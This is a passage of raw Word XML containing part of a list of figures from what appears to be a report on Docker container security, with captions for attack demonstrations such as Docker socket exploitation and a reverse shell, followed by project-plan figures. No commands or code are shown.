        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>62</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3CE8DF10" w14:textId="45BEC4D8" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858648" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 57: Attacker lists the files on the target container.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858648 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>62</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4CC22C2C" w14:textId="491E2B72" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858649" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 58:Before the attack</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858649 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>64</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50257923" w14:textId="5A17B63E" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858650" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 59: A container launched based on the base image attacker.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858650 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>65</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="48A515CC" w14:textId="254755CC" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858651" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 60: After the attack.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858651 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>65</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="00420409" w14:textId="013467B7" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858652" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 61: A container accessing via ssh to non-ssh container.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858652 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>66</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7FA18756" w14:textId="3DD66728" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858653" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 62: Exploiting Docker socket.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858653 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>66</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="72D1E5AD" w14:textId="68EFB95B" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858654" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 63: Identifying Docker images on the host via the Docker socket.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858654 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>67</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="79651A9A" w14:textId="09871F6D" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858655" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 64: Creating a container mapped to the host directory.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858655 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>67</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="36BA706B" w14:textId="199FF786" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858656" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 65: Surfing on the host directories.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858656 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>67</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2977970F" w14:textId="73912219" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858657" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 66: Accessing the /etc/passwd file directory.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858657 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>69</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6BEADA49" w14:textId="730EFA6E" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858658" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 67: Script to execute reverse shell.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858658 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>69</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2BC5196F" w14:textId="2EDD751B" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858659" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 68: The Listener.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858659 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>69</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="436D74FE" w14:textId="6491FAE6" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858660" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 69: sample Gantt chart with all the tasks.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858660 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>79</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="592DFA8E" w14:textId="6BF29E91" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858661" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 70: the project plan with Gantt chart.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858661 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>79</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="53F201F6" w14:textId="213A65E1" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858662" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 71: Logbook.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858662 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>80</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3F09DDA3" w14:textId="77777777" w:rsidR="00581369" w:rsidRDefault="00335AC3" w:rsidP="00B669F0">
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="27637BC0" w14:textId="77777777" w:rsidR="002D51F6" w:rsidRDefault="00770D8D" w:rsidP="00770D8D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770D8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LIST OF TABLES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F1A5AC" w14:textId="5CA2B6CD" w:rsidR="00335AC3" w:rsidRPr="00770D8D" w:rsidRDefault="00DE7DE9" w:rsidP="002D51F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TABLE</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rsidR="006F0639">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
